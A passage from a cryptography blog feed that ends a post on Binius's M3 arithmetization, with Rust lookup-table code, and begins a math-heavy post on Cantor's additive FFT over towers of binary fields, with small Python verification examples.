&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let lookup_counts = tally(cs, witness, &amp;amp;[], self.lookup_channel, &amp;amp;IncrIndexedLookup)?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; Fill the lookup table with the sorted counts&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let sorted_counts = lookup_counts&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    .into_iter()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    .enumerate()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    .sorted_by_key(|(_, count)| Reverse(*count))&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    .collect::&amp;lt;Vec&amp;lt;_&amp;gt;&amp;gt;();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;println!(&amp;quot;------- Increment Table -------&amp;quot;);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;println!(&amp;quot;Sorted counts: {sorted_counts:?}&amp;quot;);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;witness.fill_table_parallel(&amp;amp;self.incr_table, &amp;amp;sorted_counts)?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;This should print:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;------- Increment Table -------&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Sorted counts: [&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    (257, 2), (258, 2), (256, 1), (0, 0), (1, 0), (2, 0), ..., (510, 0), (511, 0)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
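&lt;p&gt;The sorting step can be reproduced with the standard library alone. The sketch below is a hypothetical standalone version (not the Binius API): it pairs each count with its index and performs a stable sort by descending count, mirroring &lt;code&gt;sorted_by_key(|(_, count)| Reverse(*count))&lt;&#x2F;code&gt;. Stability is what makes $(257, 2)$ precede $(258, 2)$ in the output, since ties keep their original index order:&lt;&#x2F;p&gt;

```rust
use std::cmp::Reverse;

// Hypothetical standalone sketch of how `sorted_counts` is derived from
// `lookup_counts`: pair each count with its index, then stable-sort by
// descending count.
fn sort_counts(lookup_counts: Vec<u32>) -> Vec<(usize, u32)> {
    let mut sorted: Vec<(usize, u32)> = lookup_counts.into_iter().enumerate().collect();
    // `sort_by_key` is stable, so equal counts keep their index order.
    sorted.sort_by_key(|&(_, count)| Reverse(count));
    sorted
}

fn main() {
    // Toy counts mirroring the Merkle tree example: three nonzero entries.
    let mut lookup_counts = vec![0u32; 512];
    lookup_counts[257] = 2;
    lookup_counts[258] = 2;
    lookup_counts[256] = 1;
    let sorted = sort_counts(lookup_counts);
    assert_eq!(sorted[0], (257, 2));
    assert_eq!(sorted[1], (258, 2));
    assert_eq!(sorted[2], (256, 1));
    assert_eq!(sorted[3], (0, 0)); // everything else has count 0
}
```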
&lt;p&gt;The &lt;code&gt;IncrLookup&lt;&#x2F;code&gt; instance uses these counts to fill its internal &lt;code&gt;entries_ordered&lt;&#x2F;code&gt; and &lt;code&gt;entries_sorted&lt;&#x2F;code&gt; columns, and its &lt;code&gt;LookupProducer&lt;&#x2F;code&gt; records the exact multiplicity for each valid increment operation that occurred in the Merkle tree paths computation.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;This post offers an in-depth exploration of Binius’s M3 arithmetization framework, using a Merkle tree inclusion proof as a concrete example. We examined how tables and channels serve as the foundational abstractions in M3, replacing the traditional concept of a sequential execution trace with a declarative, data-driven model. In this paradigm, computation is decomposed into modular tables, while global consistency is maintained through channel balancing.&lt;&#x2F;p&gt;
&lt;p&gt;At the core of the example lies the &lt;code&gt;MerkleTreeCS&lt;&#x2F;code&gt; gadget, which coordinates five specialized tables and multiple channels to verify Merkle path correctness. The &lt;code&gt;NodesTable&lt;&#x2F;code&gt; handles the hashing of parent-child node relationships, the &lt;code&gt;RootTable&lt;&#x2F;code&gt; ties computed paths to expected root values, and the &lt;code&gt;IncrLookup&lt;&#x2F;code&gt; table validates depth transitions using a permutation-checked lookup structure. These components communicate via channels like &lt;code&gt;nodes_channel&lt;&#x2F;code&gt; and &lt;code&gt;lookup_channel&lt;&#x2F;code&gt;, ensuring that every consumed value was properly produced and accounted for.&lt;&#x2F;p&gt;
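&lt;p&gt;The channel-balancing discipline described above can be modeled in a few lines of Rust. This is a toy sketch, not the Binius API: a channel tracks the net multiplicity of every value that flows through it, and the system is consistent only if every channel nets out to zero:&lt;&#x2F;p&gt;

```rust
use std::collections::HashMap;

// Toy model of channel balancing: every value pulled from a channel must
// have been pushed, with matching multiplicities.
#[derive(Default)]
struct Channel {
    counts: HashMap<u64, i64>, // value -> pushes minus pulls
}

impl Channel {
    fn push(&mut self, v: u64) {
        *self.counts.entry(v).or_insert(0) += 1;
    }
    fn pull(&mut self, v: u64) {
        *self.counts.entry(v).or_insert(0) -= 1;
    }
    // Balanced iff every value's pushes and pulls cancel exactly.
    fn is_balanced(&self) -> bool {
        self.counts.values().all(|&c| c == 0)
    }
}

fn main() {
    let mut chan = Channel::default();
    chan.push(42);
    chan.pull(42);
    assert!(chan.is_balanced());
    chan.pull(7); // consumed but never produced: the system cannot balance
    assert!(!chan.is_balanced());
}
```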
</description>
      </item>
      <item>
          <title>Additive FFT: background</title>
          <pubDate>Tue, 17 Jun 2025 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/additive-fft-background/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/additive-fft-background/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/additive-fft-background/">&lt;p&gt;&lt;strong&gt;Warning&lt;&#x2F;strong&gt; : This post is more math heavy than other articles.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;In this article we continue our study of &lt;a href=&quot;&#x2F;the-fields-powering-binius&#x2F;&quot;&gt;towers of binary fields&lt;&#x2F;a&gt;, motivated by the proposal of Diamond and Posen for a complete protocol working over fields of &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Characteristic_(algebra)&quot;&gt;characteristic 2&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.binius.xyz&#x2F;&quot;&gt;BINIUS&lt;&#x2F;a&gt;. Previously we covered basic arithmetic of field elements in a tower of binary fields, namely Wiedemann’s iterative quadratic extension of $\mathbb{F_2}$. We address the problem of evaluating and interpolating polynomials with coefficients in such fields, with cryptographic applications in mind. Devising a smart and efficient algorithm for doing polynomial evaluations will open the door for efficient implementation of Reed-Solomon encoding in characteristic 2, which is a crucial building block for polynomial commitments.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;on-the-general-problem-of-polynomial-multiplication&quot;&gt;On the general problem of polynomial multiplication&lt;&#x2F;h2&gt;
&lt;p&gt;Having covered the structure of Wiedemann’s binary tower, it is natural to wonder how functions over this tower can be evaluated or multiplied together. For our goals this is important, since polynomial evaluation over a cleverly selected subset of the base field (for example, the $n$-th roots of unity) is the basis for encoding messages using Reed-Solomon techniques; in this light, the problem of polynomial evaluation is &lt;em&gt;very close&lt;&#x2F;em&gt; to the problem of Reed-Solomon encoding.&lt;&#x2F;p&gt;
&lt;p&gt;An efficient method for polynomial multiplication comes to mind: the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;tree&#x2F;main&#x2F;crates&#x2F;math&#x2F;src&#x2F;fft&quot;&gt;Fast Fourier Transform&lt;&#x2F;a&gt; algorithm. It employs the celebrated scheme&lt;&#x2F;p&gt;
&lt;p&gt;$$\text{ evaluate }\implies\text{ multiply }\implies \text{ interpolate}$$&lt;&#x2F;p&gt;
&lt;p&gt;In more technical terms for the acquainted reader, “polynomial evaluation” stands for “take the FFT of the polynomial”, “multiply” means “&lt;strong&gt;pointwise&lt;&#x2F;strong&gt; multiply their FFTs”, and “interpolate” says “take the inverse FFT of the result”. This general scheme allows us to bypass the computational cost of multiplying two polynomials by the distributive law, as in high school. These “evaluation” and “interpolation” steps usually involve matrix multiplication; whenever we evaluate a polynomial $f$ at the powers of a primitive $n$-th root of unity and $n$ is a power of 2, a recursive algorithm is available and all of this can be done quickly, in $\mathcal{O}(n\log(n))$ operations. This is surely one of the most well-recorded facts in the history of mathematics; literature abounds.&lt;&#x2F;p&gt;
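&lt;p&gt;To make the scheme concrete, here is a minimal, self-contained Rust sketch of evaluate, pointwise multiply, and interpolate. It uses plain evaluation points $0, 1, \ldots, n-1$ over floating-point numbers and Lagrange interpolation, so it illustrates only the pipeline, not the speed: this runs in $\mathcal{O}(n^2)$, whereas a true FFT over roots of unity achieves $\mathcal{O}(n\log(n))$. The helper names &lt;code&gt;eval&lt;&#x2F;code&gt; and &lt;code&gt;interpolate&lt;&#x2F;code&gt; are ours, for illustration:&lt;&#x2F;p&gt;

```rust
// Evaluate a polynomial (coefficients in ascending order) via Horner's rule.
fn eval(poly: &[f64], x: f64) -> f64 {
    poly.iter().rev().fold(0.0, |acc, &c| acc * x + c)
}

// Lagrange interpolation through the points (i, ys[i]) for i = 0..ys.len()-1,
// returning coefficients in ascending order. O(n^2), unlike an inverse FFT.
fn interpolate(ys: &[f64]) -> Vec<f64> {
    let n = ys.len();
    let mut coeffs = vec![0.0; n];
    for i in 0..n {
        // Build the i-th Lagrange basis polynomial prod_{j != i} (x - j).
        let mut basis = vec![1.0];
        let mut denom = 1.0;
        for j in 0..n {
            if i == j {
                continue;
            }
            // Multiply the basis polynomial by (x - j).
            let mut next = vec![0.0; basis.len() + 1];
            for (k, &b) in basis.iter().enumerate() {
                next[k] -= (j as f64) * b;
                next[k + 1] += b;
            }
            basis = next;
            denom *= (i as f64) - (j as f64);
        }
        for (k, &b) in basis.iter().enumerate() {
            coeffs[k] += ys[i] * b / denom;
        }
    }
    coeffs
}

fn main() {
    let (p, q) = ([1.0, 2.0], [3.0, 4.0]); // 1 + 2x and 3 + 4x
    let n = 3; // the product has degree 2, so 3 evaluation points suffice
    // Evaluate both polynomials and multiply pointwise.
    let ys: Vec<f64> = (0..n)
        .map(|x| eval(&p, x as f64) * eval(&q, x as f64))
        .collect();
    // Interpolate the pointwise products back into coefficients.
    let product: Vec<i64> = interpolate(&ys).iter().map(|c| c.round() as i64).collect();
    assert_eq!(product, vec![3, 10, 8]); // (1 + 2x)(3 + 4x) = 3 + 10x + 8x^2
}
```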
&lt;p&gt;So what about applying the FFT here? Well, there’s a catch. In the context of finite fields, “roots of unity” may not readily exist, or finding a sufficient number of them might require working in much larger and more complex extension fields. &lt;strong&gt;This fundamental limitation renders the standard FFT either impractical or very slow for these specific field types.&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;h2 id=&quot;a-general-framework-for-towers-of-extensions-in-positive-characteristic&quot;&gt;A general framework for towers of extensions in positive characteristic&lt;&#x2F;h2&gt;
&lt;p&gt;To overcome this, we look into the work of David Cantor, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.sciencedirect.com&#x2F;science&#x2F;article&#x2F;pii&#x2F;0097316589900204&quot;&gt;“On Arithmetical Algorithms over Finite Fields”&lt;&#x2F;a&gt; from 1989. There he develops an analogue of the FFT that operates on &lt;strong&gt;additive subgroups&lt;&#x2F;strong&gt; of the base field instead of multiplicative ones; since we are now dealing with additions instead of multiplications of group elements, this scheme is usually coined the “Additive FFT”. Cantor finds an analogue of the roots of unity and proceeds to break down the problem into a smaller one that can be solved recursively, just like in the classical FFT case. The good news is that these additive subgroups are none other than $\mathbb{F_p}$-vector subspaces, closely related to the familiar subfields that appear in Wiedemann’s work and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2023&#x2F;1784&quot;&gt;Diamond and Posen’s proposal&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
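&lt;p&gt;For a concrete picture in characteristic 2: given $k$ linearly independent elements $\beta_1, \ldots, \beta_k$ of the field, their $\mathbb{F_2}$-span&lt;&#x2F;p&gt;
&lt;p&gt;$$U = \{ b_1 \beta_1 + \cdots + b_k \beta_k : b_i \in \mathbb{F_2} \}$$&lt;&#x2F;p&gt;
&lt;p&gt;is an additive subgroup with $2^k$ elements, and subspaces of this kind (together with their cosets) are the evaluation domains over which the additive FFT operates.&lt;&#x2F;p&gt;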
&lt;p&gt;The crucial object for the construction of the Additive FFT is the notion of &lt;strong&gt;linearized polynomial&lt;&#x2F;strong&gt;; they are a special class of polynomials that exhibit very interesting properties due to their “linear” nature with respect to addition and scalar multiplication in the base finite field. &lt;strong&gt;A linearized polynomial is such that all its monomials have a degree that is a power of $q$, that is $q^r$&lt;&#x2F;strong&gt;; this is a polynomial of the form (check the appendix at the end for more)&lt;&#x2F;p&gt;
&lt;p&gt;$$L(x) = \sum_{ i = 0 }^d a_i x^{ q^i }$$&lt;&#x2F;p&gt;
&lt;p&gt;where $a_i \in F_q$ (in this discussion, assume $p$ is a prime number and $q = p^n$ for some natural number $n$). The main property of these polynomials is that, since we’re working modulo $p$, they &lt;strong&gt;behave just like linear transformations, in the standard linear algebra sense&lt;&#x2F;strong&gt;. This is, they satisfy for any $u, v \in F_{ q^n }$ and $c \in F_q$:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;$L(u + v) = L(u) + L(v)$&lt;&#x2F;li&gt;
&lt;li&gt;$L(cu) = cL(u)$&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
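&lt;p&gt;These two properties are easy to check by brute force in the smallest interesting example. The following sketch uses our own toy encoding, elements of $GF(4)$ as the integers 0–3 with reduction modulo $X^2 + X + 1$, and verifies that $L(x) = x^2 + x$ (which is $t^p - t$ for $p = 2$, since $-1 = 1$) is $\mathbb{F_2}$-linear and that its kernel is exactly $\mathbb{F_2}$:&lt;&#x2F;p&gt;

```python
MOD4 = 0b111  # X^2 + X + 1, irreducible over F_2; GF(4) = F_2[X]/(X^2 + X + 1)

def gf4_mul(a, b):
    # carry-less (XOR) multiplication of two GF(4) elements, then reduction
    r = 0
    for i in range(2):
        if (b >> i) & 1:
            r ^= a << i
    if r & 0b100:        # reduce the X^2 term via X^2 = X + 1
        r ^= MOD4
    return r

def L(x):
    # the linearized polynomial L(x) = x^2 + x over F_2 (addition is XOR)
    return gf4_mul(x, x) ^ x

# F_2-linearity: L(u + v) = L(u) + L(v) for every u, v in GF(4)
assert all(L(u ^ v) == L(u) ^ L(v) for u in range(4) for v in range(4))

# the set of roots of L is a vector space: here exactly F_2 = {0, 1}
assert [x for x in range(4) if L(x) == 0] == [0, 1]
```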
&lt;p&gt;Whenever we have a linearized polynomial $L$, the set of its roots (zeros) &lt;em&gt;forms a vector space over $\mathbb{F_q}$&lt;&#x2F;em&gt; (called the kernel):&lt;&#x2F;p&gt;
&lt;p&gt;$$Ker(L) = \{v \in \mathbb{F_{ q^n }} : L(v) = 0 \}\subset \mathbb{F_{ q^n }}$$&lt;&#x2F;p&gt;
&lt;p&gt;a fact that stems from the general theory of linear algebra; this means that linear combinations of roots are still roots of $L$. Lastly, the very form (along with the linearity just discussed) of linearized polynomials offers a very neat property: the composition of linearized polynomials is again linearized. &lt;em&gt;This is the backbone of Cantor’s description of towers of fields in positive characteristic&lt;&#x2F;em&gt;.&lt;&#x2F;p&gt;
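&lt;p&gt;The closure of linearized polynomials under composition can also be checked numerically. In the sketch below (a toy model of $GF(16)$ as $\mathbb{F_2}[X]&#x2F;\langle X^4 + X + 1\rangle$, an encoding we chose purely for illustration), composing $S(t) = t^2 + t$ with itself agrees pointwise with the single linearized polynomial $t^4 + t$:&lt;&#x2F;p&gt;

```python
MOD = 0b10011  # X^4 + X + 1, irreducible over F_2; GF(16) = F_2[X]/(MOD)

def gmul(a, b):
    # carry-less multiplication in GF(16), reducing mod X^4 + X + 1
    r = 0
    while b:
        if b & 1:
            r ^= a
        a <<= 1
        if a & 0b10000:
            a ^= MOD
        b >>= 1
    return r

def S(x):          # S(t) = t^2 + t (addition in characteristic 2 is XOR)
    return gmul(x, x) ^ x

def S2(x):         # the linearized polynomial t^4 + t
    x2 = gmul(x, x)
    return gmul(x2, x2) ^ x

# S∘S is again linearized, and equals t^4 + t on all of GF(16)
assert all(S(S(x)) == S2(x) for x in range(16))
# ...and it is F_2-linear too
assert all(S(S(u ^ v)) == S(S(u)) ^ S(S(v)) for u in range(16) for v in range(16))
```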
&lt;h2 id=&quot;towers-of-extensions-in-prime-characteristic&quot;&gt;Towers of extensions in prime characteristic&lt;&#x2F;h2&gt;
&lt;p&gt;To be concise, we will concentrate on a very simple yet important example that will drive our understanding of Cantor’s Additive FFT effort. Fix a prime $p$, let $\tilde{F}$ be the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Algebraic_closure&quot;&gt;algebraic closure&lt;&#x2F;a&gt; of $\mathbb{F_p}$ (for example, the complex numbers $\mathbb{C}$ are the algebraic closure of the real numbers $\mathbb{R}$), and take the linearized polynomial&lt;&#x2F;p&gt;
&lt;p&gt;$$S(t) = t^p - t$$&lt;&#x2F;p&gt;
&lt;p&gt;From the basic definitions discussed above, we get a whole collection of objects. Consider successive compositions of $S$ with itself, obtaining the collection of linearized polynomials&lt;&#x2F;p&gt;
&lt;p&gt;$$S_{m} (t) = S\circ S\circ\cdots\circ S (t) = S(S_{ m - 1}(t))$$&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * For notational convenience, set $W_1 = Ker(S) = \mathbb{F_p}$ and $W_m = Ker(S_m)$: the collection of roots of $S_m$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * This is where all the clockwork comes to life, since for all $m$ the following are true:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. $W_{ m - 1}\subset W_m$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. $S: W_m \rightarrow W_{ m - 1}$ is a surjective function&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. $W_{ m - 1}$ has [codimension](https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Codimension) 1 in $W_m$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;This last subitem plays a very important role in the structure of Cantor’s idea: it means that &lt;strong&gt;if we picture $W_m$ like a chocolate bar, then it can also be thought of as the union of exactly $p$ disjoint copies of $W_{ m - 1}$&lt;&#x2F;strong&gt;: draw a rectangle and call it $W_m$ and then split it into $p$ pieces of equal shape and size. Each one of those is a copy of $W_{ m - 1}$!&lt;&#x2F;p&gt;
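&lt;p&gt;The chocolate-bar picture can be verified concretely. Taking $p = 2$ and working inside $GF(16)$ (our own choice of ambient field, encoded as $\mathbb{F_2}[X]&#x2F;\langle X^4 + X + 1\rangle$), the sketch below computes $W_1 = Ker(S)$ and $W_2 = Ker(S\circ S)$ and checks that $W_2$ splits into two disjoint translates of $W_1$:&lt;&#x2F;p&gt;

```python
MOD = 0b10011  # X^4 + X + 1; GF(16) contains W_2 = GF(4) as a subfield

def gmul(a, b):
    # carry-less multiplication in GF(16) mod X^4 + X + 1
    r = 0
    while b:
        if b & 1:
            r ^= a
        a <<= 1
        if a & 0b10000:
            a ^= MOD
        b >>= 1
    return r

def S(x):  # S(t) = t^2 + t
    return gmul(x, x) ^ x

W1 = [x for x in range(16) if S(x) == 0]        # Ker(S)   = F_2
W2 = [x for x in range(16) if S(S(x)) == 0]     # Ker(S∘S) = GF(4)

assert W1 == [0, 1] and len(W2) == 4
assert set(W1) <= set(W2)                       # W_1 ⊂ W_2
assert {S(x) for x in W2} == set(W1)            # S surjects W_2 onto W_1

# the "chocolate bar": W_2 is the disjoint union of p = 2 translates of W_1
u = next(x for x in W2 if x not in W1)
assert set(W2) == set(W1) | {u ^ w for w in W1}
assert not set(W1) & {u ^ w for w in W1}
```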
&lt;p&gt;Once equipped with this (very) brief summary, here’s where the good stuff comes. A key observation is that whenever $m=p^k$, since we work modulo $p$ we have a very neat shape for the linearized polynomials involved:&lt;&#x2F;p&gt;
&lt;p&gt;$$S_{ p^k } (t) = t^{ p^{ p^k } } - t$$&lt;&#x2F;p&gt;
&lt;p&gt;They are said to be &lt;strong&gt;sparse&lt;&#x2F;strong&gt; in the sense that they have only a few nonzero coefficients; this comes in handy when computing the complexity of polynomial division later on. The set of roots of $S_{ p^k }$ forms a field of exactly $p^{ p^k }$ elements, and so, recalling the itemized list of properties, what we obtain is a tower of extensions of $\mathbb{F_p}$:&lt;&#x2F;p&gt;
&lt;p&gt;$$W_1 \subset W_p \subset W_{ p^2 }\subset\ldots\subset W_{ p^k }\subset\ldots $$&lt;&#x2F;p&gt;
&lt;p&gt;in which at every step we have degree $p$ field extensions $[W_{ p^k } : W_{ p^{ k - 1} }] = p$. Surjectivity of the map $S : W_m \rightarrow W_{ m - 1}$ implies that for each $k\geq 1$ and each $u_{ k - 1}\in W_{ p^{k - 1 }}$ there always exists an element $u_k\in W_{ p^k } - W_{ p^{ k - 1 }}$ such that&lt;&#x2F;p&gt;
&lt;p&gt;$$S(u_k) = u_{ k - 1}$$&lt;&#x2F;p&gt;
&lt;p&gt;and this will bring a very familiar result.&lt;&#x2F;p&gt;
&lt;p&gt;Setting $p=2$ we recover Wiedemann’s tower of binary fields:&lt;&#x2F;p&gt;
&lt;p&gt;$$W_1 \subset W_2\subset W_{ 2^2 }\subset\ldots\subset W_{ 2^{ k }}\subset\ldots $$&lt;&#x2F;p&gt;
&lt;p&gt;which we recognize by acknowledging the equivalence of notation $$W_{ 2^{ k }} = \mathcal{T_k}$$ since both fields have exactly $2^{ 2^k }$ elements.&lt;&#x2F;p&gt;
&lt;p&gt;Furthermore, the surjectivity of the map $S$ allows to find generators and basis for each of the levels of the tower. Explicitly,&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;The first generator of the tower is set to be 1.&lt;&#x2F;li&gt;
&lt;li&gt;The second generator is an element $u_0$ satisfying $S(u_0) = 1$. Notice that this is equivalent to $u_0$ being a root of $X^2 + X + 1$. Since this polynomial has no roots in $\mathbb{F_2}$, we conclude that $u_0 \notin\mathbb{F_2}$.&lt;&#x2F;li&gt;
&lt;li&gt;The third generator is then defined by $S( u_1 ) = u_0$. This implies $u_1^2 + u_1 = u_0$, or equivalently $u_1^2 + u_1 + u_0 = 0$; that is, $u_1$ is a root of $X^2 + X + u_0 \in \mathcal{T_1} [X]$. It is easy to check that this polynomial has no roots in $\mathcal{T_1}$, and so $u_1\notin\mathcal{T_1}$.&lt;&#x2F;li&gt;
&lt;li&gt;For $k &amp;gt; 1$, the remaining generators are defined by the recursive relation $S( u_k ) = u_{ k - 1}$, which yields the field-theoretic relation $u_k^2 + u_k + u_{ k - 1} = 0$.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
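&lt;p&gt;The first two generators can be found by brute force. In the sketch below we model $\mathcal{T_2} = GF(16)$ as $\mathbb{F_2}[X]&#x2F;\langle X^4 + X + 1\rangle$ (a representation we picked for convenience; the particular roots found depend on this encoding) and solve the defining equations for $u_0$ and $u_1$:&lt;&#x2F;p&gt;

```python
MOD = 0b10011  # X^4 + X + 1; GF(16) = F_2[X]/(MOD) realizes T_2 in this toy model

def gmul(a, b):
    # carry-less multiplication in GF(16) with reduction mod X^4 + X + 1
    r = 0
    while b:
        if b & 1:
            r ^= a
        a <<= 1
        if a & 0b10000:
            a ^= MOD
        b >>= 1
    return r

# u_0: a root of X^2 + X + 1, equivalently S(u_0) = u_0^2 + u_0 = 1
u0 = next(x for x in range(16) if gmul(x, x) ^ x == 1)
# u_1: a root of X^2 + X + u_0, equivalently S(u_1) = u_0
u1 = next(x for x in range(16) if gmul(x, x) ^ x == u0)

T1 = {0, 1, u0, u0 ^ 1}       # T_1 = GF(4), spanned by {1, u_0} over F_2
assert u0 not in {0, 1}       # u_0 lies strictly above F_2 ...
assert u1 not in T1           # ... and u_1 strictly above T_1
```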
&lt;p&gt;Building upon these generators, Cantor then defines basis elements $y_m$ according to the base-$2$ (binary) expansion of $m$, mimicking what was naturally exploited in field element multiplication in Wiedemann’s binary tower. Explicitly, if we write down $m$’s binary expansion&lt;&#x2F;p&gt;
&lt;p&gt;$$m = m_k 2^k + m_{ k - 1} 2^{ k - 1} + \cdots + m_0 2^0$$&lt;&#x2F;p&gt;
&lt;p&gt;where $m_i \in \{0 , 1 \}$ are the bits of $m$, then:&lt;&#x2F;p&gt;
&lt;p&gt;$$y_m = u_0^{ m_0 } u_1^{ m_1 } \cdots u_k^{ m_k }.$$&lt;&#x2F;p&gt;
&lt;p&gt;To get our feet wet, here are some example basis elements:&lt;&#x2F;p&gt;
&lt;p&gt;1. $y_0 = 1$ (for $m = 0$, all $m_i = 0$)&lt;br &#x2F;&gt;
2. $y_1 = u_0$ (for $m = 1$, binary is $1_2$, so $m_0 = 1$)&lt;br &#x2F;&gt;
3. $y_2 = u_1$ (for $m = 2$, binary is $10_2$, so $m_1 = 1$)&lt;br &#x2F;&gt;
4. $y_3 = u_0 u_1$ (for $m = 3$, binary is $11_2$, so $m_0 = 1, m_1 = 1$)&lt;br &#x2F;&gt;
5. $y_4 = u_2$ (for $m = 4$, binary is $100_2$, so $m_2 = 1$)&lt;br &#x2F;&gt;
6. Generally, $y_{ 2^r } = u_r$ for $r = 0, 1, 2, \ldots$&lt;&#x2F;p&gt;
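&lt;p&gt;We can check that these products really form a basis in the first non-trivial case. Using generators $u_0$, $u_1$ found inside our toy model of $GF(16)$ (encoded as $\mathbb{F_2}[X]&#x2F;\langle X^4 + X + 1\rangle$, where one valid choice is $u_0 = 6$ and $u_1 = 2$), the sketch below builds $y_0,\ldots,y_3$ and verifies that their $2^4$ $\mathbb{F_2}$-linear combinations exhaust the field:&lt;&#x2F;p&gt;

```python
MOD = 0b10011  # GF(16) = F_2[X]/(X^4 + X + 1), our toy model of T_2

def gmul(a, b):
    # carry-less multiplication in GF(16) mod X^4 + X + 1
    r = 0
    while b:
        if b & 1:
            r ^= a
        a <<= 1
        if a & 0b10000:
            a ^= MOD
        b >>= 1
    return r

U = [6, 2]   # u_0, u_1: one valid generator choice in this encoding

def y(m):
    # y_m = u_0^{m_0} * u_1^{m_1} * ..., with m_i the bits of m
    r = 1
    for i, ui in enumerate(U):
        if (m >> i) & 1:
            r = gmul(r, ui)
    return r

basis = [y(m) for m in range(4)]      # {1, u_0, u_1, u_0 * u_1}

# all 2^4 F_2-linear (XOR) combinations are distinct, so this is a basis
span = set()
for mask in range(16):
    v = 0
    for i in range(4):
        if (mask >> i) & 1:
            v ^= basis[i]
    span.add(v)
assert len(span) == 16
```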
&lt;p&gt;This explicit basis for $\mathcal{T_k}$ directly corresponds to what Diamond and Posen refer to as the “multilinear basis” for the Wiedemann tower $\mathcal{T_\iota}$. They state that for $\mathcal{T_\iota}$, the set of monomials $$\{1, X_0, X_1, X_0 \cdot X_1, \ldots, X_0 \cdots X_{\iota - 1}\}$$ forms a basis, with their $X_i$ effectively serving as Cantor’s $u_i$. It is important to note that the Wiedemann tower generators in Diamond’s paper use a slightly different relation: $$X_{ j + 1}^2 + X_{ j + 1 }X_j + 1 = 0$$&lt;&#x2F;p&gt;
